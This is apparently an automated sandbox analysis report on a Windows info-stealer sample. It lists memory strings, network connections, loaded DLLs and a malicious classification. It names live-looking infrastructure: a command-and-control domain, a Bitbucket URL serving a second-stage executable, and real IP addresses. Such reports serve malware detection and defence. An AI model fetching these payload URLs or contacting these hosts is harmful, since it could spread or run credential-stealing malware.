                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: zLP3oiwG1g.exeString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/p
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443$$
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: zLP3oiwG1g.exe, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/D
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/Q=
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887616838.00000000001BA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeT2
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exex
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1393576879.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000037C000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: zLP3oiwG1g.exe, 00000000.00000003.1470542881.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1419335143.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396948693.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396086235.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396513281.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1470979861.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445721130.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396336946.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/))
                Source: zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1444894119.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418508560.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1420455624.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418683409.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/H(
                Source: zLP3oiwG1g.exe, 00000000.00000003.1418572620.000000000038C000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000036D000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000037C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api&04
                Source: zLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
                Source: zLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/s
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apin.txtPK
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.10:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.10:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.67.100:443 -> 192.168.2.10:49780 version: TLS 1.2

                System Summary

                barindex
                Source: zLP3oiwG1g.exeStatic PE information: section name:
                Source: zLP3oiwG1g.exeStatic PE information: section name: .rsrc
                Source: zLP3oiwG1g.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003875CA0_3_003875CA
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003875CA0_3_003875CA
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003302B40_3_003302B4
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0032D7950_3_0032D795
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0032AAE50_3_0032AAE5
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0032DF510_3_0032DF51
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003434010_3_00343401
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003458090_3_00345809
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003459660_3_00345966
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003434A20_3_003434A2
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003875CA0_3_003875CA
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0038AFCB0_3_0038AFCB
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003734C00_3_003734C0
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 2028
                Source: zLP3oiwG1g.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: zLP3oiwG1g.exeStatic PE information: Section: ZLIB complexity 0.9973311750856164
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@4/4
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7300
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ddc84286-a223-436f-8dbb-585c1ae4bd03Jump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: zLP3oiwG1g.exe, 00000000.00000003.1368239815.0000000005157000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396875852.00000000051CF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1369941304.000000000513B000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396513281.0000000005139000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: zLP3oiwG1g.exeVirustotal: Detection: 57%
                Source: zLP3oiwG1g.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile read: C:\Users\user\Desktop\zLP3oiwG1g.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\zLP3oiwG1g.exe "C:\Users\user\Desktop\zLP3oiwG1g.exe"
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 2028
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: zLP3oiwG1g.exeStatic file information: File size 2994688 > 1048576
